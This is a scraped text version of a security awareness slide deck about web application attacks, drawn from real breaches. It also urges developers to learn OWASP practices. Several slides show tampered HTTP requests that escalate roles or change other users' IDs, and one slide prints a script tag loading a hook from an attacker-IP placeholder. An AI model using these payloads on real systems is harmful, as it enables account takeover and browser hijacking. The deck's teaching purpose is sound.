a p p l i c at i o n s t h r o u g h a n at ta c k e r s
play

A P P L I C AT I O N S T H R O U G H A N AT TA C K E R S L E N S - PowerPoint PPT Presentation

A P P L I C AT I O N S T H R O U G H A N AT TA C K E R S L E N S M I C H A E L C O AT E S , T R U S T & I N F O R M AT I O N S E C U R I T Y O F F I C E R @ _ M W C W H AT S G O I N G W R O N G Deconstructing Breaches


  1. A P P L I C AT I O N S T H R O U G H A N AT TA C K E R ’ S L E N S M I C H A E L C O AT E S , T R U S T & I N F O R M AT I O N S E C U R I T Y O F F I C E R @ _ M W C

  2. W H AT ’ S G O I N G W R O N G Deconstructing Breaches

  3. MAY, 2011 CITIGROUP 200,000 RECORDS STOLEN BREACHED: •names •account numbers •e-mail addresses transaction histories

  4. THE ATTACK bank.com/viewAcct?id=684093411 Acct …411

  5. THE ATTACK bank.com/viewAcct?id=684093412 bank.com/viewAcct?id=684093411 Acct …411 ?

  6. THE ATTACK bank.com/viewAcct?id=684093412 bank.com/viewAcct?id=684093411 Acct …412 Acct …411

  7. One security expert familiar with the investigation wondered how the hackers could have known to breach security by focusing on the vulnerability in the browser. “It would have been hard to prepare for this type of vulnerability,” he said. The security expert insisted on anonymity because the inquiry was at an early stage. 6/14/2011 nytimes.com

  8. INDIRECT OBJECT REFERENCES OWASP TOP 10 2013 #4, 2010 #4, 2007 #4, 2004 #2, 2003 —

  9. "When you look at how the breaches are occurring, it's like penetration testing 101" Alex Cox, principal research analyst at NetWitness 6/15/2011 DarkReading.com

  10. NOVEMBER, 2012 APPLE & AT&T 114,000 RECORDS EXPOSED - MILITARY, TOP EXECS BREACHED subscribers' email addresses Phone ICC-ID DETAILS • No password or token required • XHR Request w/ User Agent for iPhone • Predictable ICC-ID within HTTP Request —> Associated email address

  11. https://www.flickr.com/photos/kalleboo/4662852294/

  12. SQL INJECTION & 2015 BREACHES & SQL VULNS • Joomla • Patreon • Planned ParentHood • Gaana Music Service • Telstra corporate network • World Trade Organization • SAP - Medical App •& more Source | “Data Breach Report”, Verizon, 2015

  13. MAY, 2015 IRS 220,000+ RECORDS BREACHED BREACHED Taxpayer Past Returns DETAILS • Used user information gathered from multiple sources • Automated completion of user questions through IRS Get Transcript application • Return: “nearly $50 million in refunds stolen before the agency spotted the problem"

  14. ONGOING: CREDENTIAL THEFT 231 Million Records 49 Searchable breaches haveibeenpwned.com

  15. T H E AT TA C K E R ’ S E Y E Targeting & Exploiting Applications

  16. ATTACKING THE FRONT DOOR

  17. ATTACKING THE FRONT DOOR steve@gmail.com password1 steve@gmail.com password2 steve@gmail.com password3

  18. ATTACKING THE FRONT DOOR Password Reuse Attack Widespread Many Users Hard to Detect Easy to Detect Targeted Traditional Brute Force Hard to Detect Easy to Detect 1 User Single Password Guess Many Passwords Guessed

  19. ATTACKING THE FRONT DOOR Many Users Password Reuse Attack Widespread Targeted Hard to Detect Easy to Detect Targeted Traditional Brute Force 1 User Hard to Detect Easy to Detect Targeted Single Password Guess Many Passwords Guessed

  20. ATTACKING THE SIDE DOOR

  21. ATTACKING THE SIDE DOOR We ask you to type the answer twice because we don't display what you are typing - that's so that someone can't read your question and answer over your shoulder.

  22. ATTACKING THE SIDE DOOR “secret questions are neither secure nor reliable enough to be used as a standalone account recovery mechanism” English Speakers: “What is your favorite food?” - 19.7% with 1 guess Arabic Speakers: ”What’s your first teacher’s name?” - 24% with 10 guesses Spanish Speakers: "What is your father’s middle name?” - 21% with 10 guesses Korean Speakers: "What is your city of birth?” - 39% with 10 guesses Korean Speakers: "What is your favorite food?” - 43% with 10 guesses googleonlinesecurity.blogspot.com

  23. FUN WITH DATA

  24. FUN WITH DATA

  25. FUN WITH DATA Unchecked Redirect? Injection? Malformed JSON? Oracle Fusion Hidden Field Iteration

  26. Alternate App Flows? XSS Injection Point?

  27. ab, xy, zz ? Multi use form? Password Reset Token?

  28. FUN WITH ACCESS CONTROL

  29. ACCOUNT SIGNUP username username email email password password role user admin

  30. ACCOUNT SIGNUP username username email email password password role user admin POST /signup HTTP/1.1 POST /signup HTTP/1.1 Host: site.com Host: site.com username=foo&email=bar@foobar. username=foo&email=bar@foobar. com&password=123& role=9 com&password=123& role=3

  31. ACCESS CONTROL PRESENTATION | BUSINESS | DATA site/com/viewUser?ID=551234 site/com/viewUser?ID=551235 User Info

  32. ACCESS CONTROL PRESENTATION | BUSINESS | DATA CREATE ADMIN New Admin POST /createAdmin HTTP/1.1 username Host: site.com permissions username=foo&email=bar@foobar. com&password=123&role=admin

  33. ACCESS CONTROL PRESENTATION | BUSINESS | DATA EDIT USER site/com/editUser?ID=551234 Enter New Name POST /editUser HTTP/1.1 Host: site.com name ID=551234&name=Bob

  34. ACCESS CONTROL PRESENTATION | BUSINESS | DATA EDIT USER site/com/editUser?ID=551234 Enter New Name POST /editUser HTTP/1.1 Host: site.com name ID= 551235 &name=Bob

  35. DON’T FORGET THE OBVIOUS Cross Site Scripting SQL Injection

  36. T H R E AT S The Enemy & Profit

  37. POTENTIAL ADVERSARIES Organized Crime Hacktivists Nation States

  38. APP VECTORS FOR DATA BREACHES Source | “Data Breach Report”, Verizon, 2015

  39. SCALABLE BLACKMARKET BUSINESSES “Paunch had more than 1,000 customers and was earning $50,000 per month from his illegal activity” Source | krebsonsecurity,.com 2013

  40. <script src=”http://<attackerIP>:3000/hook.js” type=”text/javascript”></script>

  41. BLACKMARKET PRICES

  42. YO U What to do?

  43. UNDERSTAND YOUR APPLICATION’S VALUE & ADVERSARIES

  44. LEARN TO HACK OWASP Top 10 OWASP Security Shepherd OWASP WebGoat Bug Bounty Programs Your Applications

  45. LEARN TO DEFEND Capture The Flag Fix Security Bugs OWASP Top 10 OWASP Cheat Sheets

  46. T H A N K S M I C H A E L C O AT E S @ _ M W C

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend


More recommend